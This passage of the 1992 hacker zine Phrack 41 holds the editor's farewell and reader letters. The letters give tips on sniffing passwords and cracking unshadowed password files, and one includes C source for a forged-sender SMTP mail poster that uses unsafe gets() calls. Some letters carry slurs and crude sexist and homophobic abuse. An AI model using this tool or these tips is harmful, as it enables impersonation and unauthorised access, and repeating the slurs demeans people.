home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / zines / Phrack / Phrack Issue 41.sit / Phrack Issue 41
Text File  |  1993-02-08  |  357KB  |  7,194 lines

  1.                                 ==Phrack Inc.==
  2.  
  3.                    Volume Four, Issue Forty-One, File 1 of 13
  4.  
  5.                                  Issue 41 Index
  6.                               ___________________
  7.  
  8.                                P H R A C K   4 1
  9.  
  10.                                December 31, 1992
  11.                               ___________________
  12.  
  13.                    ~ We've Had A Rest, We're Still The Best ~
  14.  
  15. You've been waiting for this for a while and it's finally here.  A lot has
  16. happened since the last issue.  I guess I should start off with the most
  17. important thing as far as the administration of Phrack is concerned:  Phrack 41
  18. is the last issue for which I will serve as editor.
  19.  
  20. Why?  Well for one, I was in a motorcycle wreck about a month ago and lost the
  21. use of my right arm for a while and, due to the related financial difficulties,
  22. I was forced to sell my computers and some other stuff.
  23.  
  24. Secondly, due to my lack of being a rich boy and having access to a nice
  25. machine, I found it necessary to allow others to help me in putting out the
  26. past several issues and that has resulted in some things being released that I
  27. really wasn't happy with.
  28.  
  29. However, don't get me wrong.  I'm not gonna sit here and dis my friends just
  30. because we differ in opinion about some things.  I think that the overall
  31. quality of the issues has been pretty good and anyone who says it's not can
  32. basically suck my dick, because I don't give a fuck about your opinion anyway.
  33.  
  34. Thirdly, and the most important reason why I am resigning as editor of Phrack,
  35. is a general lack of desire on my part.  I mean the whole reason I even got
  36. involved with doing this was because of hacking -- partly for curiosity and
  37. partly for being able to thumb my nose at the powers that be and other
  38. intellectual types that say, "You can't do/learn about that because we don't
  39. think blah blah blah."  Like I'm supposed to give a fuck what anyone else
  40. thinks.  The type of public service that I think hackers provide is not showing
  41. security holes to whomever has denied their existence, but to merely embarrass
  42. the hell out of those so-called computer security experts and other purveyors
  43. of snake oil.  This is a service that is truly unappreciated and is what keeps
  44. me motivated.  ANYWAY...if you wanna hear me rant some more, maybe I'll get to
  45. do my own Eleeeeet3 Pro-Phile in the future.  Heh!
  46.  
  47. But really, since my acquisition of Phrack, my play time has been hampered and
  48. consequently, I have started to become bored with it.  It was great to meet a
  49. lot of cool people and I learned some things.  It's now time for me to go back
  50. to doing what I like best.  For anyone who's interested in corresponding, I'm
  51. focusing my time on radio communications, HAM radio, scanning, and cellular
  52. telephones.  If you are interested in talking about these things to me or
  53. whatever, feel free to write me at dispater@stormking.com.
  54.  
  55. Aside from all that, I feel that Phrack can be better.  That's why issue 42
  56. will have a new editor and administrative staff.  I'm not saying who, but you
  57. may be surprised.  NO, it's not KL or TK either.
  58.  
  59. And with that, I'm saying adios and, as Adam Grant said, "Don't get caught."
  60.  
  61. Now onto the issue:
  62.  
  63. In this issue's Loopback, Phrack responds to the numerous letters it has
  64. received over the past several months, including the return of Shit Kickin' Jim
  65. and a message from Rop, editor of Hack-Tic.
  66.  
  67. The Racketeer (Rack of The Hellfire Club) continues his Network Miscellany
  68. column with plenty of new information about fake mail.
  69.  
  70. Phrack Pro-Phile focuses on one of the hacking community's most mysterious
  71. figures:  Supernigger.  SN was somewhat involved with the infamous DPAK and has
  72. some words of wisdom to the eleets and other folks who enjoy boasting about
  73. their number of years in "the hacker scene."
  74.  
  75.                             DISPATER, Phrack Editor
  76.  
  77.  
  78.  
  79.       Editor-In-Chief : Dispater
  80.        Eleet Founders : Taran King and Knight Lightning
  81.  Technical Consultant : Mind Mage
  82.    Network Miscellany : The Racketeer [HFC]
  83.                  News : Datastream Cowboy
  84.               Make-up : Hair Club for Men
  85.           Photography : Restricted Data Transmissions
  86.             Publicity : AT&T, BellSouth, and the United States Secret Service
  87.     Creative Stimulus : Camel Cool, Jolt Cola, and Taco Bell
  88.         Other Helpers : Scott Simpson, Zibby, The Weazel, The Fed, El1teZ
  89.                         Everywhere.
  90.  
  91.  
  92.   "For the record, we're hackers who believe information should be free.  All
  93.    information.  The world is full of phunky electronic gadgets and networks
  94.         and we want to share our information with the hacker community."
  95.                         -- Restricted Data Transmissions
  96.  
  97.  
  98.                 "They are satisfying their own appetite to know
  99.                      something that is not theirs to know."
  100.                  -- Assistant District Attorney, Don Ingraham
  101.  
  102.  
  103.        "The notion that how things work is a big secret is simply wrong."
  104.                    -- Hacking/Cracking conference on The WELL
  105.  
  106.  
  107.  
  108.                                 -= Phrack 41 =-
  109.  
  110.  Table Of Contents
  111.  ~~~~~~~~~~~~~~~~~
  112.  1. Introduction by Dispater                                               07K
  113.  2. Phrack Loopback by Dispater and Mind Mage                              52K
  114.  3. Phrack Pro-Phile on Supernigger                                        10K
  115.  4. Network Miscellany by The Racketeer [HFC]                              35K
  116.  5. Pirates Cove by Rambone                                                32K
  117.  6  Hacking AT&T System 75 by Scott Simpson                                20K
  118.  7. How To Build a DMS-10 Switch by The Cavalier                           23K
  119.  8. TTY Spoofing by VaxBuster                                              20K
  120.  9. Security Shortcomings of AppleShare Networks by Bobby Zero             16K
  121. 10. Mall Cop Frequencies by Caligula XXI                                   11K
  122. 11. PWN/Part 1 by Datastream Cowboy                                        46K
  123. 12. PWN/Part 2 by Datastream Cowboy                                        49K
  124. 13. PWN/Part 3 by Datastream Cowboy                                        43K
  125.                                                                    Total: 364K
  126.  
  127.                               There is no America.
  128.                              There is no democracy.
  129.                       There is only IBM and ITT and AT&T.
  130.                                 -- Consolidated
  131. _______________________________________________________________________________
  132.  
  133.                                 ==Phrack Inc.==
  134.  
  135.                    Volume Four, Issue Forty-One, File 2 of 13
  136.  
  137.                           [-=:< Phrack Loopback >:=-]
  138.  
  139.                             By Dispater & Mind Mage
  140.  
  141.      Phrack Loopback is a forum for you, the reader, to ask questions, air
  142. problems, and talk about what ever topic you would like to discuss.  This is
  143. also the place Phrack Staff will make suggestions to you by reviewing various
  144. items of note; books, magazines, software, catalogs, hardware, etc.
  145.  
  146. In this issue:
  147.  
  148.      Comments on Phrack 40                        : Rop Gonggrijp
  149.      Fine Art of Telephony (re: Phrack 40)        : Inhuman
  150.      Question & Comment (BT Tymnet/AS400)         : Otto Synch
  151.      BT Tymnet article in Phrack 40               : Anonymous
  152.      Phrack fraud?                                : Doctor Pizz
  153.      Remarks & Warning!                           : Synaps/Clone1/Feyd
  154.      One Ron Hults (re: Phrack 38 Loopback)       : Ken Martin
  155.      Hacking In Czecho-Slovakia                   : Stalker
  156.      Phrack 40 is Sexist!                         : Ground Zero
  157.      Phrack 40 is Sexist!? (PC Phrack)            : Shit Kickin' Jim
  158.      Misunderstood Hackers Get No Respect         : The Cruiser
  159.      Hackers Should Land In Jail, Not In Press    : Alan Falk
  160.      Anonymous Usenet Posting?                    : Anonymous
  161.      Anonymous Mail Poster                        : Sir Hackalot
  162.      Phrack On The Move                           : Andy Panda-Bear
  163.      Computer Underground Publications Index      : Amadeus
  164.      Pirates v. AT&T: Posters                     : Legacy Irreverent
  165.      Ultrix 4.2 Bug                               : Krynn
  166.      PumpCon Hosed                                : Phil "The Outlander"
  167.      2600 Meeting Disrupted by Law Enforcement    : Emmanuel Goldstein
  168.      Two New Hardcovers                           : Alan J. Rothman
  169. _______________________________________________________________________________
  170.  
  171.  Letters to the Editors
  172.  ~~~~~~~~~~~~~~~~~~~~~~
  173. From: rop@hacktic.nl (Rop Gonggrijp) (Editor of Hack-Tic Magazine)
  174. Date: August 14, 1992
  175. Subject: Comments on Phrack 40
  176.  
  177. My compliments!  You've put out one of the best issues to date.  If you keep
  178. this up I'll have to get jealous!
  179.  
  180.      Rop Gonggrijp (rop@hacktic.nl)        Dangerous and capable of making
  181.      fax: +31 20 6900968                        considerable trouble.
  182.  
  183. ----------
  184.  
  185. From: Inhuman (Sysop of Pentavia BBS)
  186. Date: August 18, 1992
  187. Subject: Fine Art of Telephony
  188.  
  189. I just wanted to let you guys know that the article titled "The Fine Art of
  190. Telephony" was one of the best articles I've seen in Phrack in a long time.
  191.  
  192. I hope to see more information on switching and general telephony in the
  193. future.
  194.  
  195. Thanks,
  196.  
  197. Inhuman
  198.  
  199. ----------
  200.  
  201. Date: October 22, 1992
  202. From: Otto Synch
  203. Subject: Question & Comment
  204.  
  205. Hello,
  206.  
  207. Reading your (huge) Phrack issue #40, and noticing that you were accepting
  208. comments and questions, I decided to post mine.  First of all, please forgive
  209. the English.  I'm French and can't help it :-)
  210.  
  211. My comment:  When I saw in the index that this issue was dealing with BT
  212. Tymnet, I felt very happy because I was looking for such information.  And when
  213. I read it, I felt really disappointed.  Toucan Jones could have reduced his
  214. whole article with the following lines:
  215.  
  216. -> Find any Tymnet number.
  217. -> Dial and wait for the "Please log-in:" prompt.
  218. -> Log as user "help", no password required.
  219. -> Capture everything you want, it's free public information.
  220.  
  221. I must say I was a bit surprised to find this kind of article in a high-quality
  222. magazine such as yours...
  223.  
  224. My question:  I'm currently trying to find out everything about a neat AS/400
  225. I've "found," but I never saw any "hack report" on it.  Do you know if there
  226. are any available?
  227.  
  228. OK - Let's see if you answer.  We feel somewhat lonely here in the Old
  229. Continent...but Phrack is here to keep the challenge up!
  230.  
  231. Regards,
  232.  
  233.       >  Otto Sync  <
  234.  
  235. ----------
  236.  
  237. From: Anonymous
  238. Date: August 19, 1992
  239. Subject: BT Tymnet article in Phrack 40
  240.  
  241. Dear Phrack Staff,
  242.  
  243. The BT Tymnet article in the 40th issue of Phrack was totally lame.  I hate it
  244. when people enter Telenet or Tymnet's information facility and just buffer all
  245. the sh*t that's in there.  Then they have the audacity to slap their name on
  246. the data as if they had made a major network discovery.  That's so f*ck*ng
  247. lame!
  248.  
  249. Phrack should make a policy not to accept such lame sh*t for their fine
  250. magazine.  Is Phrack *that* desperate for articles?  Crap like commercial dial-
  251. up lists is about as lame as posting a few random pages from the front of the
  252. white pages.  The information is quickly outdated and easily available at any
  253. time to anyone.  You don't hack this sh*t.
  254.  
  255. Regards,
  256.  
  257. Anonymous (anonymous because I don't want to hear any lame flames)
  258.  
  259. [Editor's Response:  We agree that buffering some dialup list is not hacking,
  260.                      however, in this specific case, a decision was made that
  261.                      not everyone had ready access to the information or even
  262.                      knew of its existence.  Furthermore and more relevant to
  263.                      why the article appeared in Phrack, an article on Tymnet
  264.                      was appropriate when considering the recent events with
  265.                      the MOD case in New York.
  266.  
  267.                      In the future, you may ask that your letter be printed
  268.                      anonymously, but don't send us anonymous mail.]
  269.  
  270. ----------
  271.  
  272. From: Doctor Pizz
  273. Date: October 12, 1992
  274. Subject: Phrack fraud?
  275.  
  276. I recently received an ad from someone who was selling the full set of Phrack
  277. back issues for $100.00.  I do believe that this is a violation of your rights
  278. to Phrack, as he is obviously selling your work for profit!
  279.  
  280. The address I received to order these disks was:
  281.  
  282.      R.E. Jones
  283.      21067 Jones-Mill
  284.      Long Beach, MS   39560
  285.  
  286. It seems he is also selling the set of NIA files for $50, a set of "Hacking
  287. Programs" for $40, LOD Tech Journals for $25, and lots of viruses.  It sounds
  288. like some sort of copyright violation, or fraud, as he is selling public domain
  289. stuff for personal profit.  At least you should be aware of this.  Anyway, I
  290. look forward to receiving future volumes of Phrack!  Keep up the good work.
  291.  
  292. Good luck in stopping this guy!
  293.  
  294. Thank you,
  295.  
  296. --Doctor Pizz--
  297.  
  298. [Editor's Note: We look forward to hearing what our Phrack readers think about
  299.                 people selling hardcopies of Phrack for their own personal
  300.                 profit.]
  301.  
  302. ----------
  303.  
  304. From: Synaps a/k/a Clone1 a/k/a Feyd
  305. Date: September 2, 1992
  306. Subject: Remarks & Warning!
  307.  
  308. Hi,
  309.  
  310. I've been a regular reader of Phrack for two years now and I approve fully the
  311. way you continue Phrack.  It's really a wonderful magazine and if I can help
  312. its development in France, I'll do as much as I can!  Anyway, this is not
  313. really the goal of my letter and excuse me for my English, which isn't very
  314. good.
  315.  
  316. My remarks are about the way you distribute Phrack.  Sometimes, I don't receive
  317. it fully.  I know this is not your fault and I understand that (this net
  318. sometimes has some problems!).  But I think you could provide a mail server
  319. like NETSERV where we could get back issues by mail and just by MAIL (no FTP).
  320.  
  321. Some people (a lot in France) don't have any access to international FTP and
  322. there are no FTP sites in France which have ANY issues of Phrack.  I did use
  323. some LISTSERV mailers with the send/get facility.  Could you install it on your
  324.  LISTSERV?
  325.  
  326. My warning is about a "group" (I should say a pseudo-group) founded by Jean
  327. Bernard Condat and called CCCF.  In fact, the JBC have spread his name through
  328. the net to a lot of people in the Underground.  As the Underground place in
  329. France is weak (the D.S.T, anti-hacker staff is very active here and very
  330. efficient), people tend to trust JBC.  He seems (I said SEEMS) to have a good
  331. knowledge in computing, looks kind, and has a lot of resources.  The only
  332. problem is that he makes some "sting" (as you called it some years ago)
  333. operation and uses the information he spied to track hackers.  He organized a
  334. game last year which was "le prix du chaos" (the amount of chaos) where he
  335. asked hackers to prove their capabilities.
  336.  
  337. It was not the real goal of this challenge.  He used all the materials hackers
  338. send him to harass some people and now he "plays" with the normal police and
  339. the secret police (DST) and installs like a trade between himself and them.
  340. It's really scary for the hacking scene in France because a lot of people trust
  341. him (even the television which has no basis to prove if he is really a hacker
  342. as he claims to be or if he is a hacker-tracker as he IS!).  Journalists take
  343. him as a serious source for he says he leads a group of computer enthusiasts.
  344.  
  345. But we discovered that his group doesn't exist.  There is nobody in his group
  346. except his brother and some other weird people (2 or 3) whereas he says there
  347. is 73 people in his club/group.  You should spread this warning to everybody in
  348. the underground because we must show that "stings" are not only for USA!  I
  349. know he already has a database with a lot of information like addresses and
  350. other stuff like that about hackers and then he "plays" with those hackers.
  351.  
  352. Be very careful with this guy.  Too many trust him.  Now it's time to be
  353. "objective" about him and his group!
  354.  
  355. Thanks a lot and goodbye.
  356.  
  357.          Synaps a/k/a Clone1 a/k/a Feyd
  358.  
  359. ----------
  360.  
  361. From: Ken Martin <70712.760@compuserve.com>
  362. Date: November 17, 1992
  363. Subject: One Ron Hults...(Phrack 38 Loopback)
  364.  
  365. Dear Phrack Staff:
  366.  
  367. This letter is concerning the letter in the Phrack Loopback column (#38, April
  368. 20, 1992) written by one Ron Hults.  It suggests that all children should be
  369. disallowed access to a computer with a modem.
  370.  
  371. The news release to which it is attached attempts to put an idea in the
  372. reader's mind that everything out there (on bulletin boards) is bad.  Anyone
  373. who can read messages from "satanic cultists, pedophile, and rapists" can also
  374. read a typical disclaimer found on most bulletin boards which have adult
  375. material and communication areas available to their users, and should be able
  376. to tell the SysOp of a BBS how old he/she is.
  377.  
  378. A child who is intelligent enough to operate a computer and modem should also
  379. be able to decide what is appropriate for him/her to read, and should have the
  380. sense enough to avoid areas of the BBS that could lead to trouble, and not to
  381. give their address and home phone number to the Charles Manson idols.  (It is a
  382. fact that all adolescents have thoughts about sex; nothing can change that.
  383. The operator of a BBS also has the moral responsibility to keep little kids out
  384. of the XXX-Rated GIF downloading area.)
  385.  
  386. One problem with that is BBSes run by the underground type (hack/phreak, these
  387. usually consist of people from 15-30 years of age).  The operators of these let
  388. practically anyone into their system, from my experiences.  These types of
  389. BBSes often have credit card numbers, telephone calling card numbers, access
  390. codes to credit reporting services, etc., usually along with text-file
  391. documents about mischievous topics.  Mr. Hults makes no mention of these in his
  392. letter and press release.  It is my belief that these types of systems are the
  393. real problem.  The kids are fascinated that, all of a sudden, they know how to
  394. make explosives and can get lots of anything for free.
  395.  
  396. I believe that the parents of children should have the sense enough to watch
  397. what they are doing.  If they don't like the kind of information that they're
  398. getting or the kind of messages that they're sending to other users, then that
  399. is the time to restrict access to the modem.
  400.  
  401. I am fifteen years old, and I can say that I have gotten into more than my
  402. share of trouble with the law as a result of information that I have obtained
  403. from BBSes and public communications services like CompuServe.  The computer is
  404. a tool, and it always will be.  Whether it is put to good use or not depends on
  405. its user.  I have put my computer/modem to use in positive applications more
  406. than destructive ones.
  407.  
  408. I would like Mr. Hults to think about his little idea of banning children from
  409. modem use, and to think about the impact it would have on their education.
  410. Many schools use computers/modems in their science and English curriculums for
  411. research purposes.
  412.  
  413. Banning children from telecommunications is like taking away connection to the
  414. outside world and all forms of publication whatsoever when one takes a look
  415. around a large information service like CompuServe or GEnie, and sees all of
  416. the information that a service like this is capable of providing to this
  417. nation.
  418.  
  419. Thanks,
  420.  
  421. Ken Martin (70712.760@compuserve.com)
  422. a.k.a. Scorpion, The Omega Concern, Dr. Scott
  423.  
  424. ----------
  425.  
  426. From: Stalker
  427. Date: October 14, 1992
  428. Subject: Hacking In Czecho-Slovakia
  429.  
  430. Hi there!
  431.  
  432. I'm student from Czecho-Slovakia (for some stupid person who doesn't know, it's
  433. in middle Europe).  Call me Stalker (if there is other guy with this name, call
  434. me what you want).  If you think that computers, networks, hacking and other
  435. interesting things are not in Eastern Europe, you're WRONG.  I won't talk
  436. about politicians. They really make me (and other men from computers) sick!
  437. I'll tell you what is interesting here right now.
  438.  
  439. Our university campus is based on two main systems, VMS and ULTRIX.  There's
  440. VAX 6000, VAX 4000, MicroVAX, VAXStation and some oldtimer machines which run
  441. under VMS.  As for hacking, there's nothing interesting.  You can't do some
  442. tricks with /etc/passwd, there's no main bug in utilities and commands.  But,
  443. as I know, VMS doesn't crypt the packets across the network so you can take
  444. some PC and Netwatch (or any other useful software ) and try to see what
  445. is interesting on the cable.  You can grab anything that you want (usernames,
  446. passwords, etc.).
  447.  
  448. Generally, students hate VMS and love UNIX-like systems.  Other machines are
  449. based on ULTRIX.  We have DECstations (some 3100, some 5000) and one SM 52-12
  450. which is something on VAX-11 :-(.  It is a really slow machine, but it has
  451. Internet access!  There's many users so you can relatively easily run Crack
  452. (excellent program) since passwd is not shadowed.  Another useful thing is tftp
  453. (see some other Crack issues).  There was a machine with enabled tftp, but
  454. after one incident, it was disabled.
  455.  
  456. I would like to tell you more about this incident but sysadmins are still
  457. suspecting (they probably read my mail).  Maybe after some months in other
  458. articles.  Now I can tell you that I'm not a real UNIX-GURU-HACKER, but the
  459. sysadmins thought that I was.  Someone (man or girl, who knows) has hacked one
  460. (or two) machines on our campus.  Administrators thought that I was this
  461. mysterious hacker but I am not!  He/she is much better than I and my friends.
  462. Today no one knows who the hacker is.  The administrator had talked to him/her
  463. and after some weeks, gave him/her an account.  He/she probably had root
  464. privileges for some time and maybe has these today.  He/she uses a modem to
  465. connect.  His/her login name is nemo (Jules Verne is a popular hero).  I will
  466. try to send mail to him/her about Phrack and maybe he/she will write
  467. interesting articles about himself.
  468.  
  469. And some tips.  Phrack is very interesting, but there's other interesting
  470. official files on cert.org (192.88.209.9) available via anonymous FTP.  This
  471. is the Computer Emergency Response Team (CERT) FTP server.  You can find
  472. interesting information here about bugs in actual software, but you will see
  473. only which command or utility has the bug, not how to exploit it.  If you are
  474. smart enough, there's nothing to say.
  475.  
  476. If you are not, you must read Phrack!  :-)
  477.  
  478. Bye,
  479.  
  480. Stalker
  481.  
  482. ----------
  483.  
  484. From: Ground Zero
  485. Date: August 25, 1992
  486. Subject: Phrack 40 is Sexist!
  487.  
  488. Hi, just a quick comment about Phrack's account of SummerCon:
  489.  
  490. I don't think your readers need to know or are really interested in hearing
  491. about the fact that Doc Holiday was busy trying to pick up girls or that there
  492. were some unbalanced teeny-boppers there offering themselves to some of the
  493. SummerCon participants.  Also, as a woman I don't care for your
  494. characterizations of females in that file.
  495.  
  496. I'm not trying to nitpick or be politically correct (I hate PC), I'm just
  497. writing because I felt strongly enough about it.  Ciao.
  498.  
  499. Ground Zero (Editor of Activist Times, Inc./ATI)
  500.  
  501. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  502.  
  503. From: Shit Kickin' Jim
  504. Date: September 11, 1992
  505. Subject: Phrack 40 is Sexist!? (PC Phrack)
  506.  
  507. Listen here woman.  I don't know whut yer big fat butt thinks Phrack wuz tryin'
  508. to insinuate.  Lemme tell yew a thang er two.  First of all, Phrack ain't run
  509. by some little pip-squeek faggot ass pansies.  Ah mean wut are you sum kinda
  510. hOmOsexual?  Here's what ah mean.  NOW here iz a real story 'bout me and one a
  511. my bestest friends: 4x4 Phreaker.
  512.  
  513. See 4x4 Phreaker come down to Texas fur a little hackin adventure.  Even though
  514. he lives up there in Yankee-land, 4x4 Phreaker iz a pretty good ol' boy.
  515. Whuddya think real manly hackers do when they get together?  Go stop by Radio
  516. Shack and buy shrink wrap?
  517.  
  518. HELL NO!  We fuckin' went to Caligula XXI.  Fur yew ol' boys that ain't from
  519. 'round here er yer a fauygut out there that might be readin this, Caligula XXI
  520. specializes in enertainmunt fer gennelmen.
  521.  
  522. Now, me and 4x4 Phreaker didn't go to hawk at some fat nasty sluts like you
  523. might see at your typical Ho-Ho Con.  We went with the purpose in mind of seein
  524. a real movie star.  Yup Christy Canyon was in the house that night.  4x4
  525. Phreaker and me sat down at a table near the front.  At that point I decided
  526. that I'd start trollin for babes.  Yep that's right I whipped out an American
  527. Express Corporate Gold card.  And I'll be damned if it weren't 3 minutes later
  528. me and 4x4 Phreaker had us 2 new found friends for the evening.
  529.  
  530. So anywayz, yew can see we treated these two fine ladies real nice and they
  531. returned the favor.  We even took em to Waffle House the next mornin'.  So I
  532. dunno where yew git off by callin us sexist.  Yer just some Yankee snob big
  533. city high horse woman who expects to be a takin care of.
  534.  
  535. God bless George Bush and his mistress Jennifer whutz her name.
  536.  
  537. :Shit Kickin' Jim (Madder than a bramer bull fightin a mess of wet hornets)
  538.  
  539. _______________________________________________________________________________
  540.  
  541.  Misunderstood Hackers Get No Respect                           August 10, 1992
  542.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  543.  by The Cruiser (ComputerWorld)(Page 24)(Letters to the Editor)
  544.  
  545. I just read the replies to Chris Goggans' "Hackers aren't the real enemy"
  546. [ComputerWorld, June 29], and I thought I'd address a few of the points brought
  547. up.  I'm a hacker -- which means that I'm every system administrator's
  548. nightmare.
  549.  
  550. Hardly.  Many hackers are politically aware activists.  Besides being fueled by
  551. an obsession for mastering technology (I call it a blatant disregard for such),
  552. true hackers live and obey a strict moral code.
  553.  
  554. All this talk about the differences between voyeurism and crime:  Please, let's
  555. stop comparing information access to breaking into someone's house.  The
  556. government can seize computers and equipment from suspected hackers, never to
  557. return it, without even charging a crime.  I will not sit back and let Big
  558. Brother control me.
  559.  
  560. The Cruiser
  561. _______________________________________________________________________________
  562.  
  563.  Hackers Should Land In Jail, Not In Press                     October 19, 1992
  564.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  565.  by Alan Falk (ComputerWorld)(Page 32)(Letters to the Editor)
  566.  
  567. The letters you get from avowed hackers seem to glorify the virtues of hacking.
  568. I find this very disturbing for a simple reason:  It completely ignores the
  569. issue of private property.
  570.  
  571. The computer systems they hack into (pun intended) and the databases they try
  572. to access, as well as the data in the databases, are private property.
  573.  
  574. An analogous argument might be that breaking and entering a jewelry store and
  575. taking off with some valuables is really a way of testing the security controls
  576. at the jeweler's establishment.  They're really just doing it for the
  577. excitement and challenge.
  578. Would they promote voyeurism based on the "logic" that "after all, if they
  579. didn't want me to look, they'd have pulled the drapes closer together?"
  580.  
  581. The fact that there's challenge or excitement involved (or even commitment,
  582. intellect or whatever) does not change the issue.
  583.  
  584. I suggest that hackers who gain entry to systems against the wishes of the
  585. systems' owners should be treated according to the laws regarding unlawful
  586. entry, theft, etc.
  587.  
  588. Alan Falk
  589. Cupertino, California
  590. _______________________________________________________________________________
  591.  
  592.  Anonymous Usenet Posting?
  593.  ~~~~~~~~~~~~~~~~~~~~~~~~~
  594. Date: August 19, 1992
  595. From: Anonymous
  596.  
  597. I've read in Phrack all about the different ways to send fake mail, but do any
  598. of the readers (or Mind Mage) know anything about anonymous newsgroup posting?
  599.  
  600. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  601.  
  602.  Anonymous Mail Poster                                           August 4, 1992
  603.  ~~~~~~~~~~~~~~~~~~~~~
  604.  by Sir Hackalot
  605.  
  606. Here is some C source to a simple "anonymous" mail poster that I wrote a LONG
  607. time ago.  It's just one of many pieces of code I never gave to anyone before.
  608. You may find it useful.  Basically, it will connect to the SMTP port and
  609. automate the sending.  It will allow for multiple recipients on the "To:" line,
  610. and multiple "To:" lines.
  611.  
  612. From: sirh@sirh.com
  613.  
  614. ------ Cut here for fm.c -----
  615. #include <stdio.h>
  616. #include <string.h>
  617. #include <sys/types.h>
  618. #include <sys/socket.h>
  619. #include <netdb.h>
  620. #include <netinet/in.h>
  621. #include <arpa/inet.h>
  622. #include <signal.h>
  623. #include <fcntl.h>
  624. #include <errno.h>
  625.  
  626.  
  627. int openSock(name,port)
  628. char *name;
  629. int port;
  630.  
  631. {
  632.       int mysock,opt=1;
  633.       struct sockaddr_in sin;
  634.       struct hostent *he;
  635.       he = gethostbyname(name);
  636.       if (he == NULL) {
  637.             printf("No host found..\n");
  638.             exit(0);
  639.       }
  640.  
  641.       memcpy((caddr_t)&sin.sin_addr,he->h_addr_list[0],he->h_length);
  642.       sin.sin_port = port;
  643.  
  644.       sin.sin_family = AF_INET;
  645.  
  646.       mysock = socket(AF_INET,SOCK_STREAM,0);
  647.  
  648.       opt = connect(mysock,(struct sockaddr *)&sin,sizeof(sin));
  649.  
  650.       return mysock;
  651.  
  652. }
  653.  
  654. /* This allows us to have many people on one TO line, seperated by
  655.    commas or spaces. */
  656.  
  657. process(s,d)
  658. int d;
  659. char *s;
  660. {
  661.       char *tmp;
  662.       char buf[120];
  663.  
  664.       tmp = strtok(s," ,");
  665.  
  666.       while (tmp != NULL) {
  667.             sprintf(buf,"RCPT TO: %s\n",tmp);
  668.             write(d,buf,strlen(buf));
  669.             tmp = strtok(NULL," ,");
  670.       }
  671.  
  672. }
  673.  
  674.  
  675.  
  676. getAndSendFrom(fd)
  677. int fd;
  678. {
  679.       char from[100];
  680.       char outbound[200];
  681.  
  682.       printf("You must should specify a From address now.\nFrom: ");
  683.       gets(from);
  684.  
  685.       sprintf(outbound,"MAIL FROM: %s\n",from);
  686.       write(fd,outbound,strlen(outbound));
  687.  
  688.  
  689.  
  690. }
  691.  
  692. getAndSendTo(fd)
  693. int fd;
  694. {
  695.       char addrs[100];
  696.  
  697.       printf("Enter Recipients, with a blank line to end.\n");
  698.  
  699.       addrs[0] = '_';
  700.  
  701.       while (addrs[0] != '\0') {
  702.             printf("To: ");
  703.             gets(addrs);
  704.             process(addrs,fd);
  705.       }
  706.  
  707. }
  708.  
  709. getAndSendMsg(fd)
  710. int fd;
  711. {
  712.       char textline[90];
  713.       char outbound[103];
  714.  
  715.       sprintf(textline,"DATA\n");
  716.       write(fd,textline,strlen(textline));
  717.  
  718.  
  719.       printf("You may now enter your message.  End with a period\n\n");
  720.       printf("[---------------------------------------------------------]\n");
  721.  
  722.       textline[0] = '_';
  723.  
  724.       while (textline[0] != '.') {
  725.             gets(textline);
  726.             sprintf(outbound,"%s\n",textline);
  727.             write(fd,outbound,strlen(outbound));
  728.       }
  729.  
  730. }
  731.  
  732.  
  733. main(argc,argv)
  734. int argc;
  735. char *argv[];
  736. {
  737.  
  738.       char text[200];
  739.       int file_d;
  740.  
  741.       /* Get ready to connect to host. */
  742.       printf("SMTP Host: ");
  743.       gets(text);
  744.  
  745.       /* Connect to standard SMTP port. */
  746.       file_d = openSock(text,25);
  747.  
  748.       if (file_d < 0) {
  749.             printf("Error connecting to SMTP host.\n");
  750.             perror("smtp_connect");
  751.             exit(0);
  752.       }
  753.  
  754.       printf("\n\n[+ Connected to SMTP host %s +]\n",text);
  755.  
  756.       sleep(1);
  757.  
  758.       getAndSendFrom(file_d);
  759.  
  760.       getAndSendTo(file_d);
  761.  
  762.       getAndSendMsg(file_d);
  763.  
  764.       sprintf(text,"QUIT\n");
  765.       write(file_d,text,strlen(text));
  766.  
  767.     /* Here we just print out all the text we got from the SMTP
  768.        Host.  Since this is a simple program, we didnt need to do
  769.        anything with it. */
  770.  
  771.     printf("[Session Message dump]:\n");
  772.       while(read(file_d,text,78) > 0)
  773.             printf("%s\n",text);
  774.       close(file_d);
  775. }
  776. ----- End file fm.c
  777. _______________________________________________________________________________
  778.  
  779. From: Andy Panda-Bear
  780. Date: September 25, 1992
  781. Subject: Phrack on the move
  782.  
  783. To Whom It May Concern:
  784.  
  785. I love reading your Phrack articles and find them very, very informative as
  786. well as helpful.  I was wondering in you've ever or plan to put together a
  787. compendium of related articles.  For instance, you could make a Phrack guide to
  788. telephony and include all telephone/telecommunications articles.  Perhaps a
  789. "Phrack Guide to UNIX" or "Phrack Guide to Internet" could be produced.  It
  790. could have reprints of past articles along with commentaries by individuals who
  791. care to share their knowledge.  Anyway it's just something to think about.
  792.  
  793. Thanks for many megabytes of useful info and keep it coming.
  794.  
  795.       Later,
  796.  
  797.       Andy Panda-Bear
  798.  
  799. ----------
  800.  
  801.  Computer Underground Publications Index
  802.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  803.  by Amadeus
  804.  
  805. I just finished the new edition of the Phrack Index, now called the Computer
  806. Underground Publications Index since it now includes the issues of the Legion
  807. of Doom Tech Journals and Informatik.
  808.  
  809. You can get it from ftp.uu.net as /tmp/CUPindex
  810.  
  811. I have already sent it to da folks at CUD so that they may enter it into their
  812. archives.
  813.  
  814. The CUP has been updated to included all the Phracks up to 40.
  815.  
  816. C'ya
  817.  
  818. Amadeus
  819. _______________________________________________________________________________
  820.  
  821.  Pirates v. AT&T: Posters                                        August 8, 1992
  822.  ~~~~~~~~~~~~~~~~~~~~~~~~
  823.  by Legacy Irreverent (legacy@cpu.cyberpnk1.sai.com)
  824.  
  825. On May 24 1992, two lone Pirates, Legacy of CyberPunk System, and Captain
  826. Picard of Holodeck, had finally had enough of AT&T.  Together, they traveled to
  827. the AT&T Maintenance Facility, just west of Goddard, Kansas, and claimed the
  828. property in the name of Pirates and Hackers everywhere.  They hoisted the Jolly
  829. Roger skull and crossbones high on the AT&T flagpole, where it stayed for 2
